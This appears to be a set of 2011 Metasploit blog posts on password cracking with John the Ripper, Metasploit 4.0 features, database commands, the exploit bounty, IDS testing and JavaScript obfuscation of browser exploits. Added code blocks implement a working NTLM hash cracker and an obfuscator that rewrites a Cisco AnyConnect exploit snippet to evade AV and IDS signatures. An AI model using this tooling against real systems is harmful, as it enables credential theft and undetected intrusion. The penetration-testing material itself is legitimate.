
HDM recently added password cracking functionality to Metasploit through the inclusion of John the Ripper (JtR) in the Framework. The 'auxiliary/analyze/jtr_crack_fast' module was created to make JtR easy to use from the Framework and to hook it directly into Express/Pro's automated collection routine. The module works against known Windows hashes (NTLM and LANMAN). It uses hashes in the database as input, so make sure you've run hashdump with a database connected to your Framework instance (Pro does this automatically) before running the module. The module collects the hashes from the database, writes them to a generated PWDUMP-format file, and passes that file to the john binaries that are now (r13135) included in the Framework.

 

Several JtR modes are used for quick, targeted cracking. First, wordlist mode: the generated wordlist consists of the standard john wordlist with known usernames, passwords, and hostnames appended. A ruleset based on the KoreLogic mutation rules is then used to generate mutations of these words. You can find the msf version of these rules in the john.conf shipped with the Framework.

 

Once the initial wordlist run is complete, two incremental modes, aptly named All4 and Digits5, are used to brute force additional combinations: every printable-ASCII string of up to 4 characters, and every digit string of 1 to 5 digits. These modes are defined in the same john.conf configuration file in the Framework and are shown below.

 

Cracked values are appended to the wordlist as they're found. This is beneficial for two reasons:

  1. Previously-cracked hashes are pulled from the john.pot at the start of a run, and those passwords are used as seed values for subsequent runs.
  2. Mutation rules are applied to cracked passwords, possibly enabling other previously-uncracked hashes to be broken.

 

Finally, discovered username/password combinations are reported to the database and associated with the host / service.

 

Cracking modes (run in this order):

--wordlist=<our generated wordlist> --rules single --format=lm
--incremental=All4 --format=lm
--incremental=Digits5 --format=lm
--wordlist=<our generated wordlist> --rules single --format=ntlm
--incremental=All4 --format=ntlm
--incremental=Digits5 --format=ntlm

 

Incremental modes (from the Framework's john.conf):

[Incremental:All4]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 4
CharCount = 95

[Incremental:Digits5]
File = $JOHN/digits.chr
MinLen = 1
MaxLen = 5
CharCount = 10
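The seed-and-feedback loop described above, as an added example that is not the module's code and does not call john: a pure-Ruby sketch of one wordlist pass repeated until nothing new falls, with a from-scratch MD4 standing in for john's NT format and a handful of stand-in rules in place of the single/KoreLogic rulesets. The PWDUMP lines, the wordlist and the john.pot contents are constructed here; the only real-world value is the well-known NT hash of "password".

```ruby
# Added example (not jtr_crack_fast, not john): the feedback loop in miniature.

# --- MD4 per RFC 1320; an NT hash is MD4 over the UTF-16LE password ----------
MASK32 = 0xffffffff

def md4_hex(msg)
  m = msg.b
  bitlen = m.bytesize * 8
  m += "\x80".b
  m += "\x00".b * ((56 - m.bytesize % 64) % 64)
  m += [bitlen].pack('Q<')                       # 64-bit little-endian length
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  rotl = ->(v, n) { ((v << n) | (v >> (32 - n))) & MASK32 }
  m.unpack('V*').each_slice(16) do |x|
    aa, bb, cc, dd = a, b, c, d
    16.times do |i|                                                        # round 1: F
      a = rotl.((a + ((b & c) | (~b & d)) + x[i]) & MASK32, [3, 7, 11, 19][i % 4])
      a, b, c, d = d, a, b, c
    end
    [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15].each_with_index do |k, i|  # round 2: G
      a = rotl.((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5a827999) & MASK32, [3, 5, 9, 13][i % 4])
      a, b, c, d = d, a, b, c
    end
    [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15].each_with_index do |k, i|  # round 3: H
      a = rotl.((a + (b ^ c ^ d) + x[k] + 0x6ed9eba1) & MASK32, [3, 9, 11, 15][i % 4])
      a, b, c, d = d, a, b, c
    end
    a = (a + aa) & MASK32; b = (b + bb) & MASK32; c = (c + cc) & MASK32; d = (d + dd) & MASK32
  end
  [a, b, c, d].pack('V4').unpack1('H*')
end

def ntlm_hex(password)
  md4_hex(password.encode('UTF-16LE'))
end

# Stand-in mutation rules; the real module uses john's single rules plus the
# KoreLogic-derived set from the Framework's john.conf.
RULES = [
  ->(w) { w }, ->(w) { w.capitalize }, ->(w) { w.upcase }, ->(w) { w.downcase },
  ->(w) { w + '!' }, *('0'..'9').map { |dgt| ->(w) { w + dgt } }
]

# PWDUMP lines "user:rid:LM:NT:::" -> { nt_hex => user }
def parse_pwdump(text)
  text.each_line.with_object({}) do |line, h|
    user, _rid, _lm, nt = line.strip.split(':', 5)
    h[nt.downcase] = user if nt
  end
end

# One pass: every rule applied to every seed, checked against what is left
def crack_pass(targets, seeds)
  found = {}
  seeds.each do |seed|
    RULES.each do |rule|
      cand = rule.call(seed)
      user = targets[ntlm_hex(cand)]
      found[user] = cand if user && !found.key?(user)
    end
  end
  found
end

# Seeds = wordlist + usernames + john.pot plaintexts. Every cracked password is
# fed back as a seed for the next pass, until a pass cracks nothing new.
# Returns { user => [password, pass_number] }.
def crack_with_feedback(pwdump_text, wordlist, pot = [], max_rounds = 10)
  remaining = parse_pwdump(pwdump_text)
  seeds = (wordlist + remaining.values + pot).uniq
  cracked = {}
  max_rounds.times do |i|
    round = crack_pass(remaining, seeds)
    break if round.empty?
    round.each { |user, pw| cracked[user] = [pw, i + 1] }
    remaining.reject! { |_nt, user| round.key?(user) }
    seeds = round.values                        # only the new plaintexts
  end
  cracked
end

EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'    # LM hash of an empty password
# Constructed input: dave's hash is the well-known NT hash of "password";
# the other hashes are generated here from chosen plaintexts.
SAMPLE_PWDUMP = [
  "alice:1001:#{EMPTY_LM}:#{ntlm_hex('Metasploit')}:::",
  "bob:1002:#{EMPTY_LM}:#{ntlm_hex('Metasploit1')}:::",
  "carol:1003:#{EMPTY_LM}:#{ntlm_hex('Welcome1!')}:::",
  "dave:1004:#{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::",
  "eve:1005:#{EMPTY_LM}:#{ntlm_hex('Tr0ub4dor&3')}:::"
].join("\n")
BASE_WORDLIST = %w[metasploit rapid7 summer password]   # constructed
POT = %w[Welcome1]                                     # "earlier run" plaintexts

if __FILE__ == $PROGRAM_NAME
  crack_with_feedback(SAMPLE_PWDUMP, BASE_WORDLIST, POT).each do |user, (pw, round)|
    puts "#{user}: #{pw} (pass #{round})"
  end
end
```

bob's "Metasploit1" is the point of the feedback: no single rule turns "metasploit" into it, but once pass 1 has cracked alice's "Metasploit", pass 2 appends the digit. eve's passphrase survives, as it should against a wordlist run.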

 

As with everything in the framework, it's subject to patches and improvement, so make sure to check the code. Thanks to mubix for several edits. This info is current as of July 27, 2011.

 

UPDATE: Check out KoreLogic's upcoming Defcon 19 password cracking contest if you're interested in this stuff!


Metasploit 4.0 is coming soon!

Posted by ckirsch Jul 26, 2011

It'll only be days until you can download the new Metasploit version 4.0!

 

The new version marks the inclusion of 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules, all added since the release of version 3.7.1 in May 2011. These additions include nine new SCADA exploits, improved 64-bit Linux payloads, exploits for Firefox and Internet Explorer, full-HTTPS and HTTP Meterpreter stagers, and post-exploitation modules for dumping passwords from Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and many other applications. All of these improvements are available in all Metasploit editions - the free and open source Metasploit Framework, as well as the commercial editions Metasploit Pro and Metasploit Express.

 

As usual, we'll have several blog posts about developments to the Metasploit Framework in the coming weeks. In this post, I'd like to focus on some of the new features in the commercial editions. Metasploit Pro 4.0 is all about greater enterprise integration, cloud deployment options, and penetration testing automation. The best news for customers holding a valid license for Metasploit Express or Metasploit Pro: you’ll be able to upgrade free of charge. Here are some of the features in Metasploit Pro 4.0:

 

Make Metasploit Pro an integral part of your risk intelligence solution

 

  • New third-party import filters: You can now import scan results from more than a dozen third-party web application scanners and additional vulnerability assessment tools to prioritize vulnerabilities and eliminate false positives (see full list of supported import formats).
  • Deeper integration with NeXpose: While Metasploit provides only a file import option for third-party scanners, it integrates directly with one or more NeXpose scan engines to start a scan or to verify results. This is particularly useful to organizations that have deployed NeXpose as an enterprise solution. As a result, organizations can streamline the verification of vulnerabilities and reduce their remediation costs. The integration is provided through officially supported, publicly documented APIs.
  • Vulnerability Management List Editing: Add, modify, and delete vulnerability information directly through the product user interface to tweak imported data based on verification results and add additional findings as needed.
  • SIEM integration interface: Integrate Metasploit Pro with your Security Information and Event Management (SIEM) system through the RPC API and open XML format to get a better picture of your risk landscape.
  • Automated security tests: Programmatically remote control Metasploit Pro through a new RPC programming interface to verify vulnerabilities or test systems.

 

Deploy Metasploit Pro in a way that works for you

 

  • Pre-packaged images for VMware vSphere: You can now deploy Metasploit as a VMware image using VMware vSphere. This decreases provisioning costs for vulnerability programs covering remote locations. The OVF format is also compatible with other virtualization solutions.
  • Amazon Machine Image: If you need to conduct external penetration tests, you can easily deploy Metasploit in the Amazon Elastic Compute Cloud (EC2). Metasploit is available as an Amazon Machine Image (AMI) and payment for the hosting costs can be processed through Amazon Web Services (AWS) accounts, making provisioning quick and easy, even with small budgets.

 

Boost your penetration tests

 

  • Persistent agents and listeners: During a penetration test, mobile users and temporary network problems can cause established sessions to drop. Re-running the same exploit may not always lead to another session (or even be possible). Meterpreter now supports persistent agents and listeners so that the target machine actively re-establishes a session when it drops. Agents automatically expire after a pre-configured amount of time.
  • Macros: Write macros that get triggered by certain events. For example, if you launch a social engineering campaign, you won’t know when an email user will click on a link or open a malicious attachment, so it is not practical to wait for someone to do so and create a session. Using post-exploitation macros, you can automate what happens once a target user falls into a social engineering trap. For example, the macro could automatically loot the machine or carry out a set of pre-defined steps. Macros can chain together arbitrary post-exploitation modules and be extended through custom post-exploitation modules.
  • Exploit replay: You can now replay all previously successful attacks. This makes verification of patch installation and configuration changes trivial. This also allows the export from one Metasploit copy to be used in a later verification through another copy.
  • Offline password cracking: As a result of Rapid7’s sponsorship of the open-source project John the Ripper, Metasploit Pro now automatically cracks weak passwords during the evidence collection phase, making it possible to replay these passwords across multiple machines and protocols.

 

Inform stakeholders and document compliance with updated reports

 

  • FISMA reports: Easily document compliance with FISMA through a new report that maps findings to controls and requirements.
  • More visual reports: Metasploit Pro reports now contain charts and diagrams that visualize the results of a penetration test.

 

Other new features include

 

  • Increased exploitation speed
  • Updated social engineering campaigns, including the ability to clone existing websites and edit HTML in a rich editor
  • Updated user interface to simplify managing large projects
  • Easily re-run tasks that have been aborted by the user
  • Global settings for configuring NeXpose scan engines, macros, and API keys

 

If you're a Metasploit Express customer and would like to know which of these features are included in your edition, please see the Metasploit Compare & Download page.

 

Metasploit 4.0 will be available for download in August 2011. If you can't wait that long, register for an exclusive sneak preview with HD Moore this Thursday to see the new Metasploit Pro 4.0 in action!


Are you an artist?  Do you possess mad ASCII art skills?  Do you like the idea of having your artwork on the face of one of the world's largest open source projects, the de-facto standard for penetration testing, with more than one million unique downloads per year?  Then read on!

 

One of the first things many people likely noticed when updating to the Metasploit Framework version 4.0-testing was the new ASCII art. In addition to all the new awesome features we have been adding to Metasploit lately, we wanted to give Metasploit a new look and appearance. When version 4.0-testing first came out we had roughly 5 or 6 new banners. Slowly we have been adding to that number.  Now is your chance to make your mark on the Metasploit Project.

 

The Metasploit team would like to encourage the talented folks from every corner of the community to join the ASCII art fun, and submit your most awesome, creative banners to us. All submissions should be uploaded to either Metasploit Redmine (http://dev.metasploit.com), or e-mailed to msfdev@metasploit.com. If selected, your artwork will be committed in our banner.rb file, together with the following banners that we currently have:

 

Banners currently in banner.rb (shown as images in the original post):

  • Metasploit-Matrix
  • missle_command
  • Kernel panic
  • R7-Metasploit
  • 3Kom Superhack
  • I Love Shells
  • Metasploit Bull
  • Modern Cowsay

 

For questions, as always, please feel free to drop by our IRC channel (#metasploit on irc.freenode.net).

Early in the 3.x days, Metasploit had support for using databases through plugins.  As the project grew, it became clear that tighter database integration was necessary for keeping track of the large amount of information a pentester might encounter during an engagement.  To support that, we moved database functionality into the core, to be available whenever a database was connected, and later added PostgreSQL to the installer so that functionality could be used out of the box.  Still, the commands for dealing with the database and the information stored there were sort of second-class citizens, all beginning with a "db_" prefix.  We recently addressed this issue for the upcoming 4.0 release.

 

Commands that query the database have lost their "db_" prefix, while those that deal with managing the DB itself have retained it. For example, "db_hosts" is now just "hosts" and "db_status" remains the same. The idea behind this change is that hosts (and other entities) don't really have anything to do with the database other than the fact that they are stored there. Additionally, the deprecated db_import_*, db_create, and db_destroy have been removed.

 

The remaining commands have been improved by expanding search abilities and standardizing option parsing.  Where you previously had to type full IP addresses to list more than one host, now all commands that search the database take hosts in nmap host specification format (ranges and comma-separated lists per octet, plus CIDR blocks), and all of them that deal with services can take ports the same way.  Furthermore, the options have been standardized a bit, so -p always means port and -s always means service name.

 

Example usage for the services command:

 

msf > services 192.168.1-10.1,3,5 -p 22-25,80,443,445 192.168.99.0/24

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.99.1     22    tcp    ssh   open
192.168.99.141   445   tcp    smb   open   Windows XP Service Pack 2 (language: Unknown) (name:XP-SP2) (domain:WORKGROUP)
192.168.100.129  445   tcp    smb   open   Unix Samba 3.4.7 (language: Unknown) (name:FOO) (domain:FOO)

msf >

 

The new changes also make it really easy to find services running on odd ports:

 

msf auxiliary(ssh_version) > services -s ssh

Services
========

host            port  proto  name  state  info
----            ----  -----  ----  -----  ----
192.168.17.134  21    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  23    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  80    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  443   tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  1433  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  8080  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  8443  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  9022  tcp    ssh   open   SSH-2.0-OpenSSH_4.4

msf >

 

An often requested feature is the ability to run a module against hosts in the database that match certain criteria.  That is now possible for scanner modules with the hosts and services commands' new -R flag (or --rhosts), which sets RHOSTS to the list of hosts returned.  If the result is more than 5 hosts, the option value gets pretty hard to read, so Metasploit writes the list out to a temporary file instead, like so:

 

msf auxiliary(ssh_version) > services -s ssh --rhosts

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.87.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.87.119   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
192.168.87.122   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.87.126   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.140   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
192.168.87.145   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.158   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.88.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.89.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.90.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.90.61    22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.93.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.96.1     22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
192.168.96.134   22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
192.168.98.131   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 FreeBSD-20080901

RHOSTS => file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0

msf auxiliary(ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting                                   Required  Description
   ----     ---------------                                   --------  -----------
   RHOSTS   file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0  yes       The target address range or CIDR identifier
   RPORT    22                                                yes       The target port
   THREADS  254                                               yes       The number of concurrent threads
   TIMEOUT  30                                                yes       Timeout for the SSH probe
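As an added example (not the Framework's Rex::Socket::RangeWalker and not the services command itself), here is a parser for the host and port specifications the commands now accept, plus the same filtering and -R/--rhosts behaviour applied to a constructed services table. The rows, the inline limit of 5 hosts and the temp-file naming are assumptions modelled on the output above.

```ruby
# Added example: nmap-style host specs and port lists, as the db commands take them.
require 'ipaddr'
require 'set'
require 'tmpdir'

# "1-10,3,5" -> [1, 2, ..., 10, 3, 5], bounded to 0..max, duplicates removed
def expand_ranges(spec, max)
  spec.split(',').flat_map do |part|
    lo, hi = part.split('-', 2)
    lo = Integer(lo, 10)
    hi = hi ? Integer(hi, 10) : lo
    raise ArgumentError, "bad range #{part.inspect}" unless lo >= 0 && lo <= hi && hi <= max
    (lo..hi).to_a
  end.uniq
end

# Whitespace-separated tokens; each is a CIDR block or four octet specs,
# e.g. "192.168.1-10.1,3,5 192.168.99.0/24" -> 30 + 256 addresses
def expand_hosts(spec)
  spec.split.flat_map do |token|
    if token.include?('/')
      IPAddr.new(token).to_range.map(&:to_s)
    else
      octets = token.split('.', -1)
      raise ArgumentError, "bad host spec #{token.inspect}" unless octets.size == 4
      first, *rest = octets.map { |o| expand_ranges(o, 255) }
      first.product(*rest).map { |o| o.join('.') }
    end
  end.uniq
end

def expand_ports(spec)
  expand_ranges(spec, 65_535)
end

# Constructed rows with the columns the services command prints
SERVICES = [
  { host: '192.168.1.3',     port: 80,   proto: 'tcp', name: 'http', state: 'open', info: '' },
  { host: '192.168.17.134',  port: 21,   proto: 'tcp', name: 'ssh',  state: 'open', info: 'SSH-2.0-OpenSSH_4.4' },
  { host: '192.168.17.134',  port: 8080, proto: 'tcp', name: 'ssh',  state: 'open', info: 'SSH-2.0-OpenSSH_4.4' },
  { host: '192.168.99.1',    port: 22,   proto: 'tcp', name: 'ssh',  state: 'open', info: '' },
  { host: '192.168.99.141',  port: 445,  proto: 'tcp', name: 'smb',  state: 'open', info: 'Windows XP Service Pack 2' },
  { host: '192.168.100.129', port: 445,  proto: 'tcp', name: 'smb',  state: 'open', info: 'Unix Samba 3.4.7' }
].freeze

# services <hosts> -p <ports> -s <name>: any filter left nil matches everything
def filter_services(rows, hosts: nil, ports: nil, name: nil)
  host_set = hosts && expand_hosts(hosts).to_set
  port_set = ports && expand_ports(ports).to_set
  rows.select do |r|
    (host_set.nil? || host_set.include?(r[:host])) &&
      (port_set.nil? || port_set.include?(r[:port])) &&
      (name.nil? || r[:name] == name)
  end
end

# -R / --rhosts: a short list goes straight into RHOSTS; a longer one is written
# to a temp file and referenced as file:<path> so `show options` stays readable
def rhosts_value(rows, inline_limit = 5)
  hosts = rows.map { |r| r[:host] }.uniq
  return hosts.join(' ') if hosts.size <= inline_limit
  path = File.join(Dir.tmpdir, "msf-db-rhosts-#{Time.now.strftime('%Y%m%d')}-#{Process.pid}-#{rand(1 << 32).to_s(36)}")
  File.write(path, hosts.join("\n") + "\n")
  "file:#{path}"
end

if __FILE__ == $PROGRAM_NAME
  filter_services(SERVICES, hosts: '192.168.1-10.1,3,5 192.168.99.0/24', ports: '22-25,80,443,445').each do |r|
    puts format('%-16s %-5d %-5s %-5s %s', r[:host], r[:port], r[:proto], r[:name], r[:info])
  end
  puts "RHOSTS => #{rhosts_value(filter_services(SERVICES, name: 'ssh'))}"
end
```

The host-spec parser rejects octets outside 0..255 and inverted ranges rather than silently truncating; a typo in a range is better caught before a scanner module fans out across it.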

Another way to make dealing with all that data easier is through the use of workspaces.  Workspaces have been around for a while, but they are an underused feature that allows you to separate hosts, credentials, etc. for each engagement into their own silo.  Every piece of data that Metasploit records is associated with the current workspace, so it's quite easy to keep related information together and segregate different engagements by switching workspaces.

 

The command by itself will list available workspaces, the current one marked with an asterisk:

 

msf > workspace
  default
* engagement_A
  engagement_B
  engagement_C
  the_whole_friggin_internet

 

You can change the current workspace with workspace <name>.  For extra convenience, names are tab-completable, too.  You can add new workspaces with -a or delete existing ones with -d.  Note that -d assumes you really meant it and will happily delete the whole thing (including hosts, credentials, loot, and all) without prompting.

 

The journey from a glued-on appendage, to a main feature only used by db_autopwn, to a core feature integrated with the whole framework has been an adventure.  I think the result is easier access to information, better separation of that data, and a smoother, faster pentest.

After more than 30 days of hardcore and intense exploit hunting, the Metasploit Bounty program has finally come to an end. First off, we'd like to say that even though the Metasploit Framework has made exploit development much easier, the process is not always an easy task. We're absolutely amazed how hard our participants tried to make magic happen.

 

Often, the challenge begins with finding the vulnerable software. If you're lucky, you can find what you need from 3rd-party websites that mirror different versions of the application, or you can download the trial version from the vendor (that is, if the trial version is still vulnerable).  If you can't find it this way, well, good luck getting your hands on it. This process alone can sometimes take more time than writing the exploit.  Unfortunately, quite a few of our participants gave up at this phase.

 

The next thing you do is gather as much information as possible about the vulnerability (CVE, OSVDB, ZDI, mailing lists, blogs, the vendor's bug tracking system, etc.). Reverse engineer the protocol or file format you're working with, find the root cause using whatever techniques apply (patch diffing, source code auditing, fuzzing, injection, etc.), and then try to trigger a crash... hopefully a good one.  On two occasions, thanks to Joshua J. Drake, Jon Butler, and Carlos' reversing-fu, we found out that CVE-2011-0657 (MS11-030) and CVE-2011-1206 (IBM Tivoli LDAP) are most likely not exploitable. Even if a vulnerability is not exploitable, the effort spent trying to exploit it is not wasted. Often the attempt at a difficult exploit is a great learning experience, and sharing that experience gives other people insight into the real impact of the vulnerability.

 

Once you have a nice crash, you try to exploit the bug and gain code execution.  Exploitation is all about precision, and there are many things you have to consider to get reliable code execution, which means there are many ways you can fail: bad heap layout, overwrite a freed object with an incorrect size, some variable on the stack you forgot to account for, overwrite a RET address, SEH, or a ROP gadget with an address that changes with every install, every service pack, or every patch level, etc, etc. Sometimes, you don't even realize that until you start throwing the exploit against all your VMs.  If that's the case, you go back and fix it... or worst case scenario, you rewrite four or five times just to get it right.  And that sucks!

 

Keep in mind that all this hard work had to be done within one week, and many of the participants could only do it in their spare time.  Of course, a lucky few were blessed with help writing their exploits from other people in the security community, and the Metasploit team also received assistance from fellow hackers with the vetting process.  To those who helped, you know who you are -- THANK YOU! :-)   We would also like to thank the following people for participating; the amount of participation we saw was unexpected and greatly appreciated (for those who specified a nickname, that's the name you're listed under here):

 

  • BH
  • Alino
  • Joshua J. Drake
  • glitch07
  • kc57
  • Lepke
  • HeadlessZeke
  • hal
  • diedthreetimes
  • woFF
  • Abysssec
  • Lincoln & Corelanc0d3r
  • "hidden"
  • kralor
  • mog
  • axtaxt
  • rusko
  • AmonAmarth
  • Rob
  • Patrick Webster
  • Boris
  • xero_
  • nebojsa
  • Jon Butler
  • mr_me
  • cons0ul
  • Juan Vazquez
  • Mark Scrano

 

Lastly, as planned, we will move on to the payout phase. And for those who are going to Las Vegas for Black Hat / Defcon, we will see you there :-)

One of my key objectives for developing the new vSploit modules was to test network security devices such as Snort sensors. Snort and the Sourcefire enterprise products are widely deployed in enterprises, so Snort can safely be considered the de-facto standard when it comes to intrusion detection systems (IDS). So much so that even third-party intrusion detection systems often import Snort rules.

 

Organizations often have a tough time verifying that their IDS deployments actually work as intended, which is why I created several vSploit modules to test whether Snort sensors are seeing certain traffic. Since vSploit modules were made to trigger Snort alerts, they don't obfuscate attacks to avoid detection.

 

However, not every rule is used in every environment. For example, if you aren't using Microsoft Frontpage on your network, you likely won't want to use Snort's Frontpage rules. On the other hand, if you are running Frontpage you may not want to try exploiting it because it may affect the production system. Because of Metasploit Framework's flexibility, you can use the vSploit Generic HTTP Server module to host a small web server that answers all testing requests, so production systems won't be affected.

 

You can run vSploit modules with a mix of Metasploit Framework, Metasploit Pro, and Metasploit Express, provided there is end-to-end network connectivity to the vSploit instances:

 


 

 

 

To try out the new vSploit modules (the original post shows a screenshot for each step):

  1. Start up the vSploit Generic HTTP Server module.
  2. Launch the Frontpage-related attack traffic against it.
  3. Verify in Wireshark that the packets are actually being transmitted on the wire.
  4. Verify that the Snort IDS sees the activity and raises the corresponding alerts.

 

Metasploit vSploit Modules will be released at DEFCON 19.

As of this writing, Metasploit has 152 browser exploits. Of those, 116 use javascript either to trigger the vulnerability or as a means to control the memory layout of the browser process [1]. Right now most of that javascript is static. That makes it easier for anti-virus and IDS folks to signature. That makes it less likely for you to get a shell.

 

Skape recognized this problem several years ago and added Rex::Exploitation::ObfuscateJS to address it. This first-gen obfuscator was based on substituting static strings, which requires a priori knowledge of what you want to substitute, meaning you need to take care of variable names. Changes to the code need to be reflected in the calls to obfuscate(), and anything you miss will remain static. It also means that you have to ensure variable names don't end up in a string or elsewhere where they might get inadvertently smashed. To overcome these limitations, several modules employ a simple technique of using random values for javascript vars, but they lose out on string manipulations.

 

Enter RKelly, a pure-Ruby JavaScript parser. Having a full parser gives us a lot more power than the previous obfuscation techniques available in the framework. For one, it gives us type information for literals, which makes string and number mangling really easy.  While a particular static ROP chain might be easy to fingerprint, that same string can be represented numerous ways through javascript manipulations. Some of the ideas for mangling literals came from Drivesploit, with several new techniques thrown in as well. There's even a wrapper class, Rex::Exploitation::JSObfu, for dealing with it. The syntax is similar to its older cousin, but without the need for clunky lists of varnames to replace.

 

Here's an example from windows/browser/cisco_anyconnect_exec:

    js = ::Rex::Exploitation::JSObfu.new %Q|
      var x = document.createElement("object"); 
      x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
      x.url = "#{url}/#{dir}/";
    |
    js.obfuscate
    html = "<html>\n<script>\n#{js}\n</script>\n</html>"


 

And the html as delivered to a browser:

<html>
<script>
var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);
</script>
</html>

Of course, this will be different for each request.
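As an added example in JavaScript (not JSObfu or RKelly code), here is the literal mangling visible in the delivered HTML above: the chunk-and-concatenate and String.fromCharCode forms for strings, an XOR form for numbers, and a rebuild of the cisco_anyconnect_exec snippet with those transforms applied. The document stub, the URL and the use of 0o octal notation (in place of the legacy 0164 form in the output above, so the result is valid in strict mode) are assumptions. A real obfuscator needs a parser to find the literals in arbitrary code, which is exactly what RKelly provides; this version only knows the literals it is handed.

```javascript
// Added example, not Metasploit's JSObfu/RKelly: literal mangling by hand.
// Math.random is fine here: this is signature evasion, not cryptography.

const LETTERS = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
const RESERVED = new Set(['do', 'if', 'in', 'for', 'let', 'new', 'try', 'var',
  'case', 'else', 'enum', 'null', 'this', 'true', 'void', 'with']);

function randInt(n) { return Math.floor(Math.random() * n); } // 0 <= r < n

// Random identifier, unique within `taken`, never a keyword
function randIdent(len, taken) {
  for (;;) {
    let s = '';
    for (let i = 0; i < len; i++) s += LETTERS[randInt(LETTERS.length)];
    if (!RESERVED.has(s) && !taken.has(s)) { taken.add(s); return s; }
  }
}

function shuffle(a) {
  for (let i = a.length - 1; i > 0; i--) { const j = randInt(i + 1); [a[i], a[j]] = [a[j], a[i]]; }
  return a;
}

// A number in a random notation: 104, 0x68 or 0o150
function numLiteral(n) {
  const r = randInt(3);
  return r === 0 ? String(n) : r === 1 ? '0x' + n.toString(16) : '0o' + n.toString(8);
}

// "object" -> (function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })()
// Declarations are shuffled; the return expression keeps the original order.
function concatForm(s) {
  if (s === '') return '""';
  const taken = new Set();
  const parts = [];
  for (let i = 0; i < s.length;) {
    const n = 1 + randInt(4);                      // 1..4 chars per chunk
    parts.push({ name: randIdent(4, taken), text: s.slice(i, i + n) });
    i += n;
  }
  const decls = shuffle(parts.slice()).map(p => p.name + '=' + JSON.stringify(p.text));
  return '(function () { var ' + decls.join(',') + '; return ' + parts.map(p => p.name).join('+') + ' })()';
}

// "http://..." -> String.fromCharCode(104,0x74,0o164,...)
function charCodeForm(s) {
  if (s === '') return '""';
  const codes = [];
  for (let i = 0; i < s.length; i++) codes.push(numLiteral(s.charCodeAt(i)));
  return 'String.fromCharCode(' + codes.join(',') + ')';
}

function obfuscateString(s) { return randInt(2) ? concatForm(s) : charCodeForm(s); }

// n == k ^ (n ^ k): the value never appears as itself (n: non-negative int32)
function obfuscateNumber(n) {
  const k = randInt(0x7fffffff);
  return '(' + numLiteral(k) + ' ^ ' + numLiteral((n ^ k) >>> 0) + ')';
}

// What the browser does with an expression from the delivered page
function evalExpr(expr) { return new Function('return ' + expr)(); }

// The cisco_anyconnect_exec snippet from the post with its literals mangled.
// Assumption: url stands in for the module's "#{url}/#{dir}/" value.
function buildSnippet(url) {
  const v = randIdent(8, new Set());
  return [
    'var ' + v + ' = document.createElement(' + obfuscateString('object') + ');',
    v + '.setAttribute(' + obfuscateString('classid') + ', ' +
      obfuscateString('clsid:55963676-2F5E-4BAF-AC28-CF26AA587566') + ');',
    v + '.url = ' + obfuscateString(url) + ';',
    'return ' + v + ';'
  ].join('\n');
}

// Run a generated snippet against a constructed stand-in for `document`
function runSnippet(snippet) {
  const doc = { createElement: tag => ({ tag, attrs: {}, setAttribute(k, val) { this.attrs[k] = val; } }) };
  return new Function('document', snippet)(doc);
}
```

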